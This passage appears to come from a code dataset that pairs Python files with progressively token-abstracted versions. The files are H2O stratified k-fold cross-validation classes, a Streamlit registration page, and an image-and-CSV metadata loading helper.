indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n <function token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n <docstring token>\n <function token>\n <function token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n <function token>\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n <function token>\n <function token>\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n <function token>\n <function token>\n <function token>\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n" ]
false
7
41cfd558824b6561114a48a694b1e6e6a7cb8c05
import streamlit as st from streamlit.components.v1 import components from streamlit.report_thread import get_report_ctx from util.session import * from multipage import MultiPage from pages import register def app(page): if not login_status(): title_container = st.empty() remail_input_container = st.empty() rpw_input_container = st.empty() rregister_button_container = st.empty() # title_container.write("Register") email = remail_input_container.text_input("Email ") password = rpw_input_container.text_input("Password ", type="password") rregister_button = rregister_button_container.button('Register') if rregister_button: title_container.empty() remail_input_container.empty() rpw_input_container.empty() rregister_button_container.empty() login() page.app() st.experimental_rerun()
[ "import streamlit as st\nfrom streamlit.components.v1 import components\nfrom streamlit.report_thread import get_report_ctx\nfrom util.session import *\nfrom multipage import MultiPage\nfrom pages import register\n\ndef app(page):\n if not login_status():\n title_container = st.empty()\n remail_input_container = st.empty()\n rpw_input_container = st.empty()\n rregister_button_container = st.empty()\n\n # title_container.write(\"Register\")\n email = remail_input_container.text_input(\"Email \")\n password = rpw_input_container.text_input(\"Password \", type=\"password\")\n rregister_button = rregister_button_container.button('Register')\n\n if rregister_button:\n title_container.empty()\n remail_input_container.empty()\n rpw_input_container.empty()\n rregister_button_container.empty()\n login()\n page.app()\n st.experimental_rerun()", "import streamlit as st\nfrom streamlit.components.v1 import components\nfrom streamlit.report_thread import get_report_ctx\nfrom util.session import *\nfrom multipage import MultiPage\nfrom pages import register\n\n\ndef app(page):\n if not login_status():\n title_container = st.empty()\n remail_input_container = st.empty()\n rpw_input_container = st.empty()\n rregister_button_container = st.empty()\n email = remail_input_container.text_input('Email ')\n password = rpw_input_container.text_input('Password ', type='password')\n rregister_button = rregister_button_container.button('Register')\n if rregister_button:\n title_container.empty()\n remail_input_container.empty()\n rpw_input_container.empty()\n rregister_button_container.empty()\n login()\n page.app()\n st.experimental_rerun()\n", "<import token>\n\n\ndef app(page):\n if not login_status():\n title_container = st.empty()\n remail_input_container = st.empty()\n rpw_input_container = st.empty()\n rregister_button_container = st.empty()\n email = remail_input_container.text_input('Email ')\n password = rpw_input_container.text_input('Password ', type='password')\n rregister_button = rregister_button_container.button('Register')\n if rregister_button:\n title_container.empty()\n remail_input_container.empty()\n rpw_input_container.empty()\n rregister_button_container.empty()\n login()\n page.app()\n st.experimental_rerun()\n", "<import token>\n<function token>\n" ]
false
8
f2bb44600f011a205c71985ad94c18f7e058634f
import os import requests from PIL import Image from io import BytesIO import csv from typing import Iterable, List, Tuple, Dict, Callable, Union, Collection # pull the image from the api endpoint and save it if we don't have it, else load it from disk def get_img_from_file_or_url(img_format: str = 'JPEG') -> Callable[[str, str], Image.Image]: def _apply(filepath: str, url: str) -> Image.Image: img = from_file(filepath) if img is None: img = from_url(url) img.save(filepath, img_format) return img.convert('RGB') # convert to rgb if not already (eg if grayscale) return _apply def from_url(url: str) -> Image.Image: api_response = requests.get(url).content response_bytes = BytesIO(api_response) return Image.open(response_bytes) def from_file(path: str) -> Union[Image.Image, None]: if os.path.exists(path): return Image.open(path) else: return None def load_metadata(path: str, cols: Iterable[int], class_cols: Collection[int] = tuple(), valid_only: bool = True, **reader_args)\ -> Tuple[List, int, List, List[Dict[str, int]], List[Dict[int, str]], int]: metadata = [] # one dict for each class col class_to_index: List[Dict[str, int]] = [{}] * len(class_cols) index_to_class: List[Dict[int, str]] = [{}] * len(class_cols) next_indices = [0] * len(class_cols) # next index for a new class value with open(path, 'r', newline='', encoding="utf8") as metadata_file: reader = csv.reader(metadata_file, **reader_args) headers = next(reader) for row in reader: if len(row) != 0: metadatum = [row[c] for c in cols] # for all class cols, add their vals to the class_to_index and index_to_class dicts if not there already for c, class_col in enumerate(class_cols): if not row[class_col] in class_to_index[c]: class_to_index[c][row[class_col]] = next_indices[c] index_to_class[c][next_indices[c]] = row[class_col] next_indices[c] += 1 if valid_only and '' in metadatum: continue metadata.append(metadatum) len_metadata = len(metadata) num_classes = 0 if len(next_indices) == 0 else next_indices[-1] # split off the headers return metadata, len_metadata, headers, class_to_index, index_to_class, num_classes
